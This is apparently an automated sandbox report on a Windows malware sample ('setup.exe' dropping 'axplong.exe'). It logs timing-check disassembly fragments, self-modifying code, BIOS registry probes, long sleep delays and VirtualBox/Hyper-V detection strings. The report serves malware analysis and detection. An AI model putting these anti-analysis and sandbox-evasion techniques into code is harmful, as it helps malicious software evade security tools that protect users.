                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40129 second address: 4F4013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4013A second address: 4F4013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4013E second address: 4F40159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F484B2BBA86h 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40159 second address: 4F40176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F40285 second address: 4F4028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4028B second address: 4F402AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F47D8E3B0ABh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F402AB second address: 4F402AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F402AF second address: 4F402B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F402B5 second address: 4F402BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F402BB second address: 4F402BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF00A8 second address: 4EF00DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E48277h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ch 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF00DA second address: 4EF00DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF00DE second address: 4EF00E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF00E4 second address: 4EF0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0B1h 0x00000017 adc si, 1266h 0x0000001c jmp 00007F47D8E3B0B1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F47D8E3B0B0h 0x00000028 or al, 00000008h 0x0000002b jmp 00007F47D8E3B0ABh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E3B0B0h 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0168 second address: 4EF016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF016C second address: 4EF0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0172 second address: 4EF0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0178 second address: 4EF017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF017C second address: 4EF01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F47D8E48272h 0x00000010 or ax, F6C8h 0x00000015 jmp 00007F47D8E4826Bh 0x0000001a popfd 0x0000001b mov bl, cl 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov dx, cx 0x00000023 jmp 00007F47D8E4826Ch 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov dx, ax 0x0000002e mov di, si 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E4826Bh 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF01D8 second address: 4EF020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47D8E3B0B7h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF020B second address: 4EF0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48274h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0223 second address: 4EF0233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bh, 2Dh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0233 second address: 4EF026D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7FE5F4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 03B7h 0x0000000d popad 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F47D8E48276h 0x0000001a adc ch, FFFFFFD8h 0x0000001d jmp 00007F47D8E4826Bh 0x00000022 popfd 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF026D second address: 4EF02E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F47D8E3B0B9h 0x00000014 or eax, 31A7DED6h 0x0000001a jmp 00007F47D8E3B0B1h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 sbb esi, 32CCB4F8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF02E4 second address: 4EF02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF02EA second address: 4EF034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0ABh 0x00000017 or ch, 0000006Eh 0x0000001a jmp 00007F47D8E3B0B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 or eax, 7AC560E8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF034E second address: 4EF038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 598Ah 0x00000007 pushfd 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d add eax, 3A82C82Eh 0x00000013 jmp 00007F47D8E48279h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF038C second address: 4EF0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0392 second address: 4EF045F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 64F2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F484B3064DFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushfd 0x00000013 jmp 00007F47D8E48272h 0x00000018 add eax, 2261A808h 0x0000001e jmp 00007F47D8E4826Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 pushad 0x00000031 mov di, si 0x00000034 mov ax, BF49h 0x00000038 popad 0x00000039 je 00007F484B3064B3h 0x0000003f jmp 00007F47D8E48274h 0x00000044 mov edx, dword ptr [esi+44h] 0x00000047 jmp 00007F47D8E48270h 0x0000004c or edx, dword ptr [ebp+0Ch] 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F47D8E4826Eh 0x00000056 and ah, FFFFFFF8h 0x00000059 jmp 00007F47D8E4826Bh 0x0000005e popfd 0x0000005f movzx esi, bx 0x00000062 popad 0x00000063 test edx, 61000000h 0x00000069 jmp 00007F47D8E4826Bh 0x0000006e jne 00007F484B3064ACh 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F47D8E48275h 0x0000007b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF045F second address: 4EF0502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 adc ah, FFFFFFCEh 0x0000000c jmp 00007F47D8E3B0B9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 test byte ptr [esi+48h], 00000001h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F47D8E3B0B3h 0x00000020 sbb cx, 03DEh 0x00000025 jmp 00007F47D8E3B0B9h 0x0000002a popfd 0x0000002b jmp 00007F47D8E3B0B0h 0x00000030 popad 0x00000031 jne 00007F484B2F9264h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F47D8E3B0B7h 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EF0502 second address: 4EF0553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48276h 0x00000015 jmp 00007F47D8E48275h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0812 second address: 4EE08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b xor cx, 66BEh 0x00000010 jmp 00007F47D8E3B0B9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F47D8E3B0AEh 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B1h 0x00000027 xor cx, 23A6h 0x0000002c jmp 00007F47D8E3B0B1h 0x00000031 popfd 0x00000032 mov edx, esi 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F47D8E3B0AAh 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d call 00007F47D8E3B0AEh 0x00000042 mov ax, CF51h 0x00000046 pop eax 0x00000047 movsx ebx, ax 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE08B5 second address: 4EE08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE08B9 second address: 4EE08BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE08BF second address: 4EE08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE08C5 second address: 4EE08C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE08C9 second address: 4EE08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E48275h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE08F6 second address: 4EE0906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0906 second address: 4EE0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov bl, 4Ch 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48275h 0x00000015 or cx, 7286h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebx, 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c mov edx, 1973281Ah 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0954 second address: 4EE0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 jmp 00007F47D8E3B0AAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov cx, 49E9h 0x00000018 popad 0x00000019 je 00007F484B300AC2h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dx, EC34h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0982 second address: 4EE0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0995 second address: 4EE0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0999 second address: 4EE09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F47D8E48275h 0x00000014 mov ecx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47D8E48278h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE09DB second address: 4EE09EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE09EA second address: 4EE09F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE09F0 second address: 4EE0A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F484B300A48h 0x00000011 pushad 0x00000012 mov cl, 00h 0x00000014 mov bx, 5B84h 0x00000018 popad 0x00000019 test byte ptr [77436968h], 00000002h 0x00000020 jmp 00007F47D8E3B0B3h 0x00000025 jne 00007F484B300A33h 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F47D8E3B0B4h 0x00000032 sub al, 00000068h 0x00000035 jmp 00007F47D8E3B0ABh 0x0000003a popfd 0x0000003b pushad 0x0000003c push eax 0x0000003d pop edi 0x0000003e mov eax, 13FCA6F1h 0x00000043 popad 0x00000044 popad 0x00000045 mov edx, dword ptr [ebp+0Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov di, BFDCh 0x0000004f push edx 0x00000050 pop eax 0x00000051 popad 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0A6B second address: 4EE0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F47D8E4826Eh 0x00000011 adc ax, 0028h 0x00000016 jmp 00007F47D8E4826Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F47D8E48278h 0x00000022 sbb al, FFFFFF88h 0x00000025 jmp 00007F47D8E4826Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ecx, edi 0x00000030 mov si, di 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 mov edx, 22F91ECEh 0x0000003b pushfd 0x0000003c jmp 00007F47D8E4826Fh 0x00000041 sub esi, 2F50D77Eh 0x00000047 jmp 00007F47D8E48279h 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F47D8E48278h 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0B25 second address: 4EE0B34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0B34 second address: 4EE0B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 sub eax, 55E4A6EEh 0x0000000f jmp 00007F47D8E48279h 0x00000014 popfd 0x00000015 mov eax, 65277277h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F47D8E4826Dh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov al, bh 0x00000029 mov di, si 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0B87 second address: 4EE0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 21h 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0B9A second address: 4EE0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0B9E second address: 4EE0BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EE0BA4 second address: 4EE0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 1FEAA8 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 1FE9EC instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 43ADE1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 56EAA8 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 56E9EC instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 7AADE1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04F600B8 rdtsc 0_2_04F600B8
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 867Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1178Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 436Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 837Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1182Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 483Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4568Thread sleep time: -58029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412Thread sleep count: 867 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412Thread sleep time: -1734867s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728Thread sleep count: 1178 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728Thread sleep time: -2357178s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716Thread sleep count: 436 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716Thread sleep time: -13080000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2016Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232Thread sleep count: 837 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232Thread sleep time: -1674837s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280Thread sleep count: 1182 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280Thread sleep time: -2365182s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936Thread sleep count: 483 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936Thread sleep time: -966483s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM)
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
